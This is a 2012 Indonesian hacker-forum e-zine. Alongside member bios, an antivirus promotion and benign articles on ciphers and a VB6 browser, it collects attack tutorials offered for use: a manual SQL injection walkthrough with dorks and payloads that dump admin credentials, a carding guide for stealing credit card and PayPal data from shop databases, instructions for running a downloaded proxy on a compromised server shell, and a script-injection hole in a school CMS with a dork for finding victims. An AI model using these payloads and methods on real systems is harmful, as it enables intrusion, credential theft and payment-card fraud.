0
KATA PENGANTAR Puji syukur kita haturkan kepada kehadirat Tuhan, atas nikmat iman, ukhwah dan silaturahmi ini sehingga kekeluargaan kita tetap terbangun dan terawat di bawah naungan berbagai macam Agama. Pembaca, semoga gemilang dengan kehadiran sebuah Magazine dari forum kami yaitu Bogor Hackers Community (BHC) edisi pertama ini dapat bermanfaat bagi semua khususnya anggota atau member BHC, beserta staff dan administrator. Dan juga semoga para pembaca tidak kecewa terhadap isi dari BHC-Zine 1 ini. Mendidik dan mencerdaskan generasi muda bangsa merupakan kewajiban semua pihak, staff dan administrator juga yang berpartisipasi dalam pembuatan BHC-Zine ini dengan pengalamannya dalam bidang IT mencoba menularkan ilmu dan pengalamannya dalam sebuah magazine ebook ini. Namun yang membuat karya ini lebih luar biasa adalah kerja keras menyusun ebook ini semata-mata demi berbagi ilmu tanpa tujuan komersialisasi. Untuk itu ebook ini berlisensi free to public, atau GNU. Sekian dan terima kasih atas dukungan dari pembaca dan perhatiannya. Dan kami sangat mengharapkan donasi dan menjadi member aktif di http://bogorhacker.net/
Bogor, 23 September 2012 Sholahuddin Muhammad (Administrator BHC)
Daftar Isi KATA PENGANTAR............................................................................................................................................................. 0 BHC-Zine 01 ....................................................................................................................................................................... 3 BHC Story .......................................................................................................................................................................... 4 BHC Admin Identity .......................................................................................................................................................... 6 BHC Founder ................................................................................................................................................................. 6 BHC Webcoder.............................................................................................................................................................. 6
2
BHC Administrator Naufal ............................................................................................................................................ 7 BHC Administrator Xevil ............................................................................................................................................... 7 BHC Administrator Dee Dwi......................................................................................................................................... 8 BHC Administrator Justinisal........................................................................................................................................ 8 BHC On Project ................................................................................................................................................................. 9 BHC[av] ......................................................................................................................................................................... 9 Download BHC[av] ...................................................................................................................................................... 10 BHC Articles .................................................................................................................................................................... 11 TOP 5 Articles .............................................................................................................................................................. 11 Enkripsi Page Source dengan Unescape String ....................................................................................................... 11 Decrypt Vigenere Cipher dengan Javascript ........................................................................................................... 13 Tutorial membuat Proxy di Shell Inject ................................................................................................................... 15 SQL Injection Full versi 4 dan 5 ............................................................................................................................... 16 [TUTORIAL] Step By Step Carding ........................................................................................................................... 20 BHC Articles plus 01 ........................................................................................................................................................ 24 CMS Balitbang 3.4 – Insert HTML Tag at Social Enginering Page ................................................................................ 24 BHC Articles plus 02 ........................................................................................................................................................ 29 Membuat Browser Sederhana dengan Visual Basic 6 ................................................................................................ 29 BHC Donation ................................................................................................................................................................. 32 Penutup ........................................................................................................................................................................... 33 DAFTAR PUSTAKA............................................................................................................................................................ 34
BHC-Zine 01 BHC-Zine adalah sebuah buku elektronik buatan BogorHackers Community yang bertujuan untuk menambah wawasan para pembaca tentang dunia IT atau dunia hacking seperti pembahasan mengenai programming, networking, virus dan lain lain.
3
BHC-Zine 01 adalah edisi pertama yang akan kami hadirkan untuk anda, yang memungkinkan berisi tentang identitas, sejarah, bahkan sampai para admin BogorHackers Community. Mungkin bahasan seperti itu hanya ada pada edisi kali ini. Diterbitkan oleh :
BogorHackers Community Redaksi :
BHC-Crew Desain Cover :
CyberKaze & xevil : CyberKaze Layouter
Editor :
Justinisal Distribusi :
All Members BogorHackers
BHC Story Terinspirasi dari suatu kejadian di shoutbox BHC yang kalau pada kumpul bikin ngakak pastinya bikin suasana forum menyenangkan. Muncul dibenak sang penulis "Apa sih alasan para admin atau member bisa gabung di forum ini ?" ini cerita sekaligus alasan sang penulis kenapa bisa disini :D 4
Pertamanya iseng iseng nyari, ada ga sih hacker bogor , eh akhirnya sang penulis nemuin forum dengan domain yg dulu bogorhackers.com (kalo ga salah hehe.. aga lupa juga soalnya udah lama kejadiannya) .. disitu sang penulis baru kenal dua orang admin yang paling tua :p maksudnya paling dulu ada di forum, mereka adalah bhottu sang founder BHC dan om doey sang web coder BHC yang terkenal dengan handphone Sonyericsson W200 nya yang konon keramat ga ada duanya. Nongkrong disitu dan mulai lebih kenal dengan mereka dan member yang lainnya, domain pun berganti jadi bogor-h.org, disitu sang penulis kenal juga dengan Dwi a.k.a X-Cisadane :D dia juga ngebantuin BHC saat rapuh hehe. Bukan hanya itu, X-Cisadane pun menjadi member aktif di forum dan membangun forum bersama dengan lainnya. Tapi pada saat bogor-h.org bhottu sang founder jarang terlihat bahkan hampir tidak pernah melihat ada di forum . Disana masih banyak error yang bergelimpangan, dan error yang paling sang penulis ingat adalah error 404 dan error 500, mungkin bisa dibilang karena forum BHC dulu dibangun tanpa biaya sedikitpun, karena bisa dibilang semua didapatkan dengan kegiatan hacking juga.. ya disamping biaya pulsa handphone pastinya hehe. Mungkin dibenak kawan-kawan “loh? Ko pulsa handphone?” “Ya” Doey sang web coder BHC memang lebih sering ngoprek forum bahkan melakukan kegiatan hacking lewat handphone W200nya, itulah alasan mengapa disebut hp keramat doey haha . Bahkan sang penulis dan admin yang lainnya pun hampir tidak percaya dengan handphone W200nya, disaat itulah terpikirkan oleh sang penulis bahwa “Suatu yang canggih tidak selalu dibuat oleh benda yang canggih pula, tapi dengan mempunyai rasa keinginan yang tinggi, seseorang dapat membuat sesuatu yang berguna bagi orang banyak”. Itulah penyebab sampai susah ngakses forum BHC. Dua sampai tiga kali setau saya BHC dibangun ulang, sampai sampai Doey hampir mau menutup forum BHC, tapi sayang menurut saya jika ditutup.. Karena disini pasti banyak hacker muda yang belum mempunyai rumah. Tapi itu dulu ! Sekarang ? Seperti inilah BHC walau masih dalam masa pertumbuhan, tapi kerennya 7 turunan hahaha. Domain forum pun berganti menjadi http://bogorhacker.net .Ya dengan bantuan kawan-kawan baru kami yang sekarang juga menjadi administrator BHC yaitu Tomi a.k.a xevil yang aktif juga di Indonesian Hacker Team
dan Isal a.k.a justinisal yang aktif juga di forum Hacker-Newbie Community. Juga sang founder BHC yaitu bhottu yang muncul kembali dan membagi ilmu-ilmunya kepada para member BHC. Hampir ketinggalan, saat ditanyakan alasan mereka bergabung dengan BHC ada juga para admin yang menyumbangkan suaranya, yaitu doey yang dengan niat membangun forum BHC ini bukan untuk alasan yang lain-lain, atau cuma untuk berlaga yang paling pintar, tapi untuk belajar, sharing, menambah teman, dan canda bareng walau cuma dalam dunia internet, dan beliau pun berkata “coba aja mereka yang lebih pinter ato yang medium sekalipun. yang punya pengetahuan walo dikit tp di share. pasti bkal saling berguna. buat masing masing dari kita”. Dan xevil yang berkeinginan membuat rumah untuk para 5 penggemar IT se-Bogor dan se-Indonesia. Banyak kejadian , pengalaman dan ilmu pengetahuan yang kami dapat di BogorHackers, dan kami harap kawan-kawan tertarik bergabung dengan kami dan saling bertukar informasi di forum tercinta ini. Selanjutnya sang penulis akan memperkenalkan sedikit identitas para Administrator BogorHackers yang biasa disebut sebagai BHC-Crew.
BHC Admin Identity BHC Founder
6
Nick : bh0ttu Facebook : https://www.facebook.com/akubukanciter Website : http://www.akubukancheater.info/ BIO : Seorang founder BogorHackers Community dan pelopor BHC [av] atau BHC antivirus yang masih dalam pengembangan.
BHC Webcoder
Nick : Nduy a.k.a d0ey_Grunch Facebook : https://www.facebook.com/doeyGrunch?fref=ts Twitter : https://twitter.com/d0eyGrunch BIO : Webcoder BogorHackers Community, terbiasa melakukan kegiatan hacking, coding dengan menggunakan HP Sonyericsson W200 nya Hape Keramat :D
BHC Administrator Naufal
BIOGRAFI PENULIS : 7 Name : Fathin Naufal a.k.a CyberKaze, Facebook
: https://www.facebook.com/nnamikazen
Twitter
: https://twitter.com/naufalnkz
Website
: http://cyberkaze.co.cc/
E-Mai
:
[email protected]
BIO : merupakan siswa SMAN 10 Bogor (2010 – 2013). Penulis masih banyak belajar tentang dunia IT, dari programming hingga desain grafis. Penulis juga member aktif di BogorHackers Community dan salah satu Administrator di BogorHackers Community. There is No Perfect Security in Virtual World
BHC Administrator Xevil
BIOGRAFI PENULIS : Name : Tomi a.k.a xevil, Facebook : http://www.facebook.com/1463482790 Twitter
: http://www.twitter.com/tomi_riddle
Blog
: http://imnothacker.co.vu
E-Mail
:
[email protected] |
[email protected] |
[email protected]
BIO : merupakan lulusan SMKN 1 Bogor tahun 2010. Kini bekerja sebagai Desain Grafis dan merangkap sebagai salah satu Administrator aktif di BogorHackers Community. Penulis merupakan member aktif dari BogorHackers Community dan Indonesian Hacker Team. I’m Not Hacker, but I’m Crawler
BHC Administrator Dee Dwi
8
Name
: Dwi a.k.a X-Cisadane
Facebook
: https://www.facebook.com/steevee.aka
Bio
:
Setelah menamatkan pendidikan Sekolah menengah Atas, kemudian melanjutkan pendidikannya di Perguruan Tinggi Swasta jurusan Sistem pendidikannya di Gunadarma Depok, Indonesia. Sebagian besar, ilmu yang dimilikinya di dapat dari dunia maya dan dari penelitiannya yang secara otodidak. Penulis juga aktif dalam beberapa Forum Diskusi yang membahas Dunia Underground seperti : Xcode, Codenesia, BorneoCrew, DepokCyber, Cisadane Hacker Community, Muslim Hackers, Dunia Santai dan yang lainnya
BHC Administrator Justinisal
Name : Sholahuddin Muhammad Nick : Justinisal or Justin Isal Facebook : https://www.facebook.com/justinisal.fanspage Twitter : https://twitter.com/justinisal Blog : http://justin-isal.co.cc (web portal masih dalam tahap coding template mewek T_T ) LostSaga Nick : 666cullens *mainnya cuman teken D, D, D, arah dua kali :p* Bio : Seorang siswa dari MAN 2 Kota Bogor (2010 – 2013) . Editor aktif dalam dunia IT, dan masih dalam tahap belajar dan focus pada security, programming, dan computer accounting. Editor juga aktif di forum Hacker Newbie Community, dan Kaskus. Editor juga aktif di https://www.freelancer.com SAYA BUKAN MAHO -_-“ saking lama menjomblo 1,3 tahun sekarang ah. “inilah jaman dimana remaja nulis bio, panjang bener kaya riwayat hidup sama curhat (T_T)”
BHC On Project Bogor Hackers Community memang masih dibilang forum baru bahkan komunitas yang baru terbangun dan masih dalam tahap pengembangan. Tapi itu bukanlah sebuah halangan bahwa dengan keadaan yang baru dan masih belum stabil, founder BHC yang biasa disapa dengan “bh0ttu” telah menciptakan sebuah antivirus dan masih dalam tahap pengembangan. Pada BHC-Zine kali ini kami akan menjelaskan sedikit kepada teman – teman tentang BHC[av] ini. 9 BHC[av]
BHC[av] adalah antivirus lokal tak berbayar alias gratis yang dapat anda download langsung di website kami, antivirus ini di buat semata-mata karena kepedulian kami untuk memerangi para virus maker, khususnya di Indonesia. Antivirus ini dapat berjalan dengan baik pada Windows 7, 2000, XP atau Vista. Di design agar mampu membersihkan virus-virus lokal dan nonlokal, tampilan di buat simple dan elegant untuk mempermudah user dalam penggunaan BHC[av]. Antivirus ini mampu melakukan scanning hingga 3000 file / 35s. BHC[av] bebas digunakan dan disebarluaskan, dengan syarat tidak memodifikasi, tidak menambah atau menghapus file-file yang ada dalam Folder BHC[av], tidak untuk kepentingan KOMERSIAL. jika Anda adalah Donatur BHC[av], Anda boleh menggunakan BHC[av] kepentingan komersial atau profit. BHC[av] di buat dengan harapan dapat di gunakan sepenuhnya dan membersihkan virus-virus yang ada.
Untuk segala kerusakan yang terkait dengan penggunaan BHC[av] di luar tanggung jawab programmer. Kami selalu berusaha semampu kami untuk memberikan yang terbaik untuk teman-teman semua para pengguna komputer di indonesia, BHC[av] sadar masih banyak kekurangan yang ada pada program kami, maka dari itu kami menerima apapun kritik dan saran kalian. Jika ada virus yang tidak mampu BHC[av] deteksi, anda bisa mengirim sample virus untuk kami analisis atau mungkin dari kalian ingin bekerja sama dalam pengembangan BHC[av] atau ingin, mejadi donatur kami? Jika tertarik maka anda bisa menghubungi
[email protected] . 10
Download BHC[av] Dengan dirilisnya BHC[av] v1.0 Beta kami telah menyediakan beberapa link untuk mendownload BHC[av]. Hal ini bertujuan untuk mencoba dan menganalisa apa ada bug atau error pada BHC[av], jika menemukan bug / error bisa diinformasikan kepada
[email protected] . Berikut link download yang telah kami sediakan : Download via MediaFire : http://www.mediafire.com/?5z3gcqar06cz44g Download via 4shared : http://www.4shared.com/file/J1Jhbttt/BHCsetup.html Download via ziddu : http://www.ziddu.com/download/20418535/BHCsetup.exe.html password: bhcanvir Hingga pembuatan BHC-Zine 01 ini, BHC[av] sudah mengeluarkan versi terbarunya yaitu V2.3 yang bisa anda download di : http://anvir.bogorhacker.net/general/download-bhcav23/ Jika Antivirus tidak berjalan dengan benar, ada kemungkinan beberapa file penting tidak ada dalam folder dimana anda menyimpan BHC[av], pastikan pada folder anda menyimpan BHC[av] memiliki file-file di bawah ini: - bhcdatathz.dll http://www.mediafire.com/?7e3tbt09xq4esgl - FileRegister.bat http://www.mediafire.com/?ymx96ogk52hyadl - FiRecobotuthz.bat http://www.mediafire.com/?s423vd524a00b8x password: bhcanvir dan jika file" tersebut hilang atau terhapus silahkan install ulang kembali BHCsetup.exe bila masih memiliki file installer nya, atau bisa download manual di website yang telah kami sediakan diatas.
BHC Articles Dalam sebuah Zine atau yang biasa kita kenal dengan sebutan e-book, terasa kurang lengkap jika tidak disertakan sebuah artikel-artikel yang menarik dan berisi ilmu pengetahuan. Oleh karena itu BHC-Zine akan memberikan beberapa artikel yang patut untuk teman-teman baca dan sayang untuk dilewatkan, selain itu BHC-Zine juga menyertakan 5 TOP Articles dari forum yang telah kami seleksi terlebih dahulu mana artikel atau thread yang patut dimasukkan ke BHC-Zine. 11
TOP 5 Articles
Enkripsi Page Source dengan Unescape String
Kadang kala ketika kita membuat sebuah website, ada sedikit rasa kesal kalo source code yang sudah susah-susah kita bikin malah ditiru oleh orang lain. Mungkin thread ini bisa sedikit mengatasi masalah tersebut :sip Unescape String merupakan sebuah fungsi yang berguna untuk mendecode(Menerjemahkan) suatu string yang telah di encode-kan(Tulisan dalam format HexaDecima) menjadi suatu tulisan yang dapat kita baca(Tulisan dalam format Alphabet). Misalnya saja nilai Hexa 5A jika di decode(Diterjemahkan) akan menjadi huruf alphabet Z. POC (Piye Om Carane), begini lho : 1. Masuk ke website http://adf.ly/DR0IH 2. Buka source code anda, copy lalu paste di "Place Plain Source Here and Hit Encode " 3. Lalu tinggal pencet Encode, nanti muncul deh stringnya
Trus, gimana mengimplementasikannya? Buka Notepad, lalu tulis : <script language="javascript"> Nah, tulisan STRING UNESCAPE tadi ganti dengan string anda, contoh terdapat pada link berikut ini : http://bogorhacker.net/web-programming/572-enkripsi-page-source-dengan-unescape-string.html
Dan selesai, tinggal di save deh. silahkan dicoba ya om ... NB : source tidak kami sertakan dalam BHC-Zine dikarenakan source yang terlalu panjang dan sbagai gantinya kami sertakan link yang menuju source tersebut
Thread Starter :
TOP 4 Articles Decrypt Vigenere Cipher dengan Javascript
Vigenere chiper merupakan salah satu algoritma kriptografi klasik untuk menyandikan suatu plaintext dengan menggunakan teknik substitusi.Vigenere cipher pada dasarnya cukup rumit untuk 13 dipecahkan. Meskipun begitu, Vigenere cipher tetap memiliki kelemahan. Salah satunya adalah dapat diketahui panjang kuncinya dengan menggunakan metode kasiski. Hal ini disebabkan karena umumnya terdapat frasa yang berulang-ulang pada ciphertext yang dihasilkan. Enkripsi : Ci= (Pi+Ki) mod 26 Deskripsi : Pi= (Ci+Ki) mod 26 Untuk menyandikan pesan, digunakan sebuah pesan alphabetis yg di urut, dan di geser 1 shift untuk alphabet yg selanjut nya. ABCDEFGHIJKLMNOPQRSTUVWXYZ BCDEFGHIJKLMNOPQRSTUVWXYZA CDEFGHIJKLMNOPQRSTUVWXYZAB Dst.. 1. Contoh penyelesaian vigenere chiper sederhana: Plainteks : azizul hakim prabowo Key : inform atika informa Maka, akan di dapat kan chiperteks : imnokx atssm xefpfio 2. Penyelesaian vigenere chiper menggunakan pembangkit kunci euler Plainteks : KILL KING TONIGHT OR DIE Key : BUDI E= 2.71828182845904523536028747135266249775724709369995957496696762772407 …
ambil banyak digit sesuai dengan panjang plainteks (18) Ubah key menjadi angka, 1 20 3 8 setelah itu kalikan dengan bilangan euler 12038 x 27182818284590452353 = 327226766509899865425414 Pisahkan 3 sesuai banyak nya palinteks 3 27 2 26 76 6 50 98 9 98 65 4 25 41 4 Kemudian ubah bentuk menggunakan mod 26 = D B C CG Y G FA U J JI N E CF P E 14 Akhir : Plainteks : KILL KING TONIGHT OR DIE Key : DBCC GYGF AUJJINE CF PED Chiperteks : NJNN QGTL TIWROUX QW SMH Source Code : http://bogorhacker.net/keamanan-jaringan-dan-cryptography/530-decrypt-vigenere-cipher-dengan-javascript.html NB : source tidak kami sertakan dalam BHC-Zine dikarenakan source yang terlalu panjang dan sbagai gantinya kami sertakan link yang menuju source tersebut
Thread Starter :
TOP 3 Articles Tutorial membuat Proxy di Shell Inject
1. cari folder yang permision 777 (drwxrrwxrwx) dengan menggunakan command “find / - tipe d -perm 777” 15 kalo dah ketemu… masuk ke folder tersebut… 2. download file proxy.tgz ini dengan menggunakan command “wget nurfitrabudiana.com/files/proxy.tar.gz” atau “lwp-download nurfitra-budiana.com/files/proxy.tar.gz“. Kalo masih tetep gak bisa.. dengan terpaksa kamu harus dunlut file proxy.tgz trus upload ke shell inject-an kamu tadi… kalo dah ter download atau upload file proxy.tgz-nya… kamu boleh masuk ke no.3 3. extra’ file proxy dengan menggunakan command “tar -zvxf proxy.tgz” nanti akan menghasilkan folder “pro” pada folder yang 777 tadi… 4. masuk ke folder “pro” dengan menggunakan command “cd pro” 5. kemudian execute menggunakan command “./xh -s “/usr/local/apache/bin/httpd -DSSL”” 6. execute sekali lagi menggunakan command “./prox -a -d -p1810” dimana angka pada -p1810 itu digunakan sebagai port… terserah kamu buat port brapa.. yang penting jangan menggunakan kepala angka 0 ex: 0932 atau apalah.. kalo bisa kamu lihat hasil nomor hari ini di http://www.totobet.net]totobet.net hari ini… heuheuehue 7. Sukses Nah.. Untuk menggunakan proxy tersebut… dimana dns website itu sebagai nomor proxy… dan nomor togel yang di -p1810 itu, itu adalah nomor port… Nb : jika file poxy.tgz sudah mati, hubungi pos satpam terdekat
Thread Starter :
TOP 2 Articles SQL Injection Full versi 4 dan 5
Sebenarnya ada saja software untuk SQl Injection yang OTOMATIS tanpa ngetik sendiri perintah SQL... cuman kalau pakai yang OTOMATIS langsung kan belum tau bagaimana cara kerjanya software 16 tersebut... kapan bisanya kalau ketergantungan software mulu... jadi mending yang MANUAL biar terlihat lebih "COOL".. mari kita mulai... =)) Pengertian sql injection: SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data. Yang perlu di ketahui sebelum sql injection pada mysql: karakter: ' atau comments: /* atau -information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x -=[step Satu]=carilah target, misal: DORK: allinurl:/review.php?id=586 Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error. contoh: [site]review.php?id=586' atau [site]/review.php?id=-586 sehingga muncul pesan error seperti ini. Contoh: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/nowt2do/public_html/review.php on line 19 dll...
-=[step Dua]=mencari dan menghitung jumlah table yang ada dalam databasenya... gunakan perintah : order by contoh: [site]/review.php?id=-586+order+by+1-- atau [site]/review.php?id=-586+order+by+1/* 17 ceklah secara step by step (satupersatu)... misal: [site]/review.php?id=-586+order+by+1-[site]/review.php?id=-586+order+by+2-[site]/review.php?id=-586+order+by+3-[site]/review.php?id=-586+order+by+4-sehingga muncul error atau hilang pesan error... Contoh: Unknown column '9' in 'order clause' [site]/review.php?id=-586+order+by+9-berarti yang kita ambil adalah sampai angka 8 menjadi : [site]/review.php?id=-586+order+by+8--=[step Tiga]=untuk mengeluarkan angka berapa yang muncul gunakan perintah union, karena tadi error sampai angka 9 maka: [site]/review.php?id=-586+union+select+1,2,3,4,5,6,7,8-ok seumpama yg keluar angka 5, gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi misal: [site]/review.php?id=-586+union+select+1,2,3,4,version(),6,7,8-- atau [site]/review.php?id=-586+union+select+1,2,3,4,@@version,6,7,8-lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema.. -=[step Empat]=untuk menampilkan table yg ada pada web tsb adalah perintah table_name >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir [site]/review.php?id=-586+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables-18 seumpama table yang muncul adalah "admin" -=[step Lima]=untuk menampilkan semua isi dari table tsb adalah perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir [site]/review.php?id=-586+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_schema=database()--=[step Enam]=perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir [site]/review.php?id=-586+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table_name=0xhexa-pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya website yg digunakan untuk konversi : http://home.paulschou.net/tools/xlate/ contoh kata yg ingin di konversi yaitu "admin" maka akan menjadi 61646D696E [site]/review.php?id=-586+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--
-=[step Tujuh]=memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir [site]/review.php?id=-586+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)-19 contoh kata yang keluar adalah id,username,password [site]/review.php?id=586+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--=[step Delapan]=cari halaman loginnya,,, halaman yg sering yaitu : admin.php administrator.php wp-admin --->wordpress dll :) Semoga Bermanfaat =))
Thread Starter :
TOP of The TOP Articles Oke, TOP of The TOP memang cocok untuk suatu artikel atau thread yang paling bagus dan menarik pada saat BHC-Zine 01 ini dibuat, dan tanpa basa-basi TOP Thread Starter pun diraih oleh :
TOP Thread Starter : 20
[TUTORIAL] Step By Step Carding
Berjumpa lagi dengan ane gan, kali ini ane share tutorial carding, tapi ini agak sepenuhnya ga dapat targetnya susah gan jadi harus coba yang lain. tapi di thread ini ane kasih tau softwarenya cara makenya kalau soal hasil carding agak susah Persiapan software : # GOOGLE URL EXTRACTOR # SQL Exploiter Cari sendiri di google banyak oh iya salah satu software ini terdapat virus tapi ga berbahaya amat gan Kita mulai dari #Google Url Extractor 1. Buka Google Url Extractor.exe 2. Lalu masukkan dork product.asp?id= site: (terserah mau com, net, co.uk, il,us,dll usahakan yg berbasis di eropa dan AS, soalnya rata2 produk mereka di jual dengan transaksi Credits Card dan PayPal) 3. Disini aku menggunakan product.asp?id= site:com atau kalau mau ngikutin si Setan Maha Esa alias ichito bandito cari aja fbnya wkwakwkak peace bang product.asp?id= site:co.il jadi harus co.il targetnya israel
4. Terus scan, kalau sudah "found link" Remove duplicated
21
5. Lalu pindah ke tab SQL Injector query builder 6. Masukan argumen tanda tanya(?)di insert arguments here
7. if finish, click bulid and next you scan ! 8. Terus pindah ke tab berikutnya Attack Victim
9. Cari yang result errornya : "unclosed quotation mark before the character" (Ane ga tau kenapa harus yang ini. pokonya ini aje )
22
Langkah selanjutnya pemakaian SQL Exploiter 1. Buka Sqlnya 2. Terus langsung menuju TAB Attacker for Hackable ! 3. Click add manually, dan paste hasil copy dari yang di attack victim (Google url extractor), dan hilang tanda '
4. Next Clik Site info, tunggu hingga infonya keluar ! 5. Kalau sudah keluar maka tinggal get tables 6. Nanti akan muncul table table web tersebut 7. kalau sudah, pilih salah satu table yang kira2 didalamnya terdapat CC atau Paypal, Dan biasanya table ini 23 terdapat nama "Order" "buy" 8. Terus get column untuk mengetahui apa saja yang ada di table tersebut 9. Nanti kalau sudah semua, blok semua column langsung click get data Sekian dan terima kasih :) Maaf kalau jelek cuman bisa segini tutornya :wc
BHC TOP Articles Itulah 5 TOP Articles yang terpilih sebagai yang terbaik di BHC-Zine 01, dan kami BHC-Crew tidak hanya menampilkan thread terbaik diforum saja. Tapi juga akan memberikan beberapa artikel yang telah dibuat untuk BHC-Zine 01 ini,
BHC Articles plus 01 CMS Balitbang 3.4 – Insert HTML Tag at Social Enginering Page 24
Pasti semua sudah tau kan apa itu CMS? Saya akan menjelaskan sedikit. CMS (Content Management System) adalah sebuah sistem yang dibuat untuk memudahkan penggunanya dalam membuat sebuah website dinamis. Salah satu CMS yang banyak digunakan adalah Joomla, WordPress, dan masih banyak lain nya. Di Indonesia, Tim Balitbang dari Depdiknas menciptakan sebuat CMS bernama CMS Balitbang untuk memudahkan pembuatan website untuk sekolah-sekolah di Indonesia. Kali ini saya akan membahas sebuah cara untuk memasukan Tag HTML kedalam halaman website yang menggunakan CMS Balitbang v.3.4. Pada CMS Balitbang v.3.4 ada sebuah Fitur seperti Social Enginering yang memungkinkan kita untuk bersosialisasi dengan sesama Murid, Alumni, maupun Guru-guru disekolah tersebut. Halam Login :
Halaman Utama :
25
Bentuk Social Engineringnya mirip Facebook jaman dulu ya? Hihi.. Mungkin Tim Balitbang terinspirasi dari Facebook Oke lanjut, kita lihat pada menu Profil, ternyata ada submenu Custome Themes. Brarti kita bisa merubah Themesnya sesuka kita dong? Ayo kita coba. Ternyata disitu disediakan sebuah textarea untuk kita masukan script CSS yang gunanya untuk mengatur bentuk dan tampilan halaman kita. Wah yang ini mirip Friendster jaman dulu yah
Lalu, apa benar kita cuma bisa memasukan script CSS saja? Mari kita bereksperimen sebuah kata biasa kedalam textarea tersebut di bagian paling bawah.
Coba kita masukan
26
Setelah itu save, dan kita lihat halaman utamanya. Setelah berhasil akan muncul tulisan ” Perubahan custom template berhasil dilakukan “. Coba kita intip celana dalem source kode nya Tulisan kita nongol tuh, ada di barisan paling akhir sebelum tag . Itu artinya tag muncul otomatis sebagai tanda bahwa script CSS berakhir disitu. Lalu apa yang terjadi jika kita memasukan tag kedalam textarea? Artinya kita membuat baris akhir dari CSS website tersebut, dan area dibawahnya menjadi kosong dan bisa kita isi Mari lanjut ke experimen ke 2, coba kita masukan tag seperti ini :
My name is Tomi a.k.a xevil
<style> Lalu simpan dan kita lihat halaman kita.
Wow, tulisan yang kita buat dengan tag HTML tadi muncul
Lalu kenapa tadi saya menambahkan
tag <style> ? Seperti yang sudah dijelaskan di atas, pada source kode akan otomatis muncul tag dibelakang script yang kita masukan pada textarea. Itu lah alasannya kenapa saya menambahkan tag <style> di akhir script, supaya nantinya script yang kita buat tidak berantakan. 27
Mari kita lihat Source kodenya :
Sudah mengerti kan?
Selamat ! sekarang anda bisa menambahkan script sesuka anda di halaman Profil.
Lalu apakah hanya HTML? tentu tidak, kita pun bisa memasukan Javascript ke halaman tersebut. Semua terserah anda, selamat bereksperimen Note : untuk mencari situs yang menggunakan CMS Balitbang, anda bisa menggunakan dork ini di google : inurl:”.sch.id” intext:”Tim Balitbang Depdiknas versi 3.4″
28 BIOGRAFI PENULIS : Tomi a.k.a xevil, merupakan lulusan SMKN 1 Bogor tahun 2010. Kini bekerja sebagai Desain Grafis dan merangkap sebagai salah satu Administrator aktif di BogorHackers Community. Penulis merupakan member aktif dari BogorHackers Community dan Indonesian Hacker Team. I’m Not Hacker, but I’m Crawler Facebook : http://www.facebook.com/1463482790 Twitter
: http://www.twitter.com/tomi_riddle
Blog
: http://imnothacker.co.vu
E-Mail
:
[email protected] |
[email protected] |
[email protected]
BHC Articles plus 02 Membuat Browser Sederhana dengan Visual Basic 6 Anda pernah berfikir bagaimana cara membuat suatu browser seperti Mozilla Firefox, Google Chrome, Opera dan lain-lain ? Pada artikel kali ini saya mencoba membuat sebuah browser sederhana yang 29 nantinya bisa dikembangkan lagi agar lebih baik. Oke langsung kita bahas cara-caranya. Kita akan memerlukan beberapa komponen yaitu : 1 Form 4 Command Button 1 Text Box 1 Microsoft Internet Controls Pada artikel ini saya membuat sebuah form seperti pada gambar :
Ganti Caption 4 command button tersebut dengan Back , Forward , Go , Refresh dan hapus caption untuk TextBox agar terlihat bersih. Disini saya juga mengganti nama masing masing command button dengan back , forward, go , refresh dan untuk textbox saya beri nama address . Nama bisa menyesuaikan sesuai keinginan.
Sekarang tambahkan komponen Microsoft Internet Controls, dengan membuka menu Project , Components atau CTRL + T. Klik Microsoft Internet Controls lalu Oke.
30
Lalu gunakan tools Web Browser yang bergambar icon bumi di sebelah kiri
Sekarang kita tambahkan perintah pada setiap command button yang telah dibuat tadi, dengan meng-klik dua kali pada form. Pada Back tuliskan WebBrowser1.GoBack Pada Forward tuliskan WebBrowser1.GoForward Pada Go tuliskan WebBrowser1.Navigate (address.text) jika nama textbox diganti menjadi address Pada Refresh tuliskan WebBrowser1.Refresh Sekarang kita lihat hasilnya, semoga tidak ada code yang error , klik Run , Start. Jika sudah kita save dengan cara File , Make Project1.exe . Sekian artikel yang saya buat kali ini semoga bermanfaat bagi kawan-kawan semua
31 BIOGRAFI PENULIS : Naufal a.k.a CyberKaze, merupakan siswa SMAN 10 Bogor angkatan 2012/2013. Penulis masih banyak belajar tentang dunia IT, dari programming hingga desain grafis. Penulis juga member aktif di BogorHackers Community dan salah satu Administrator di BogorHackers Community. There is No Perfect Security in Virtual World Facebook : https://www.facebook.com/nnamikazen Twitter
: https://twitter.com/naufalnkz
Blog
: http://cyberkaze.co.cc/
E-Mail
:
[email protected]
BHC Donation
32
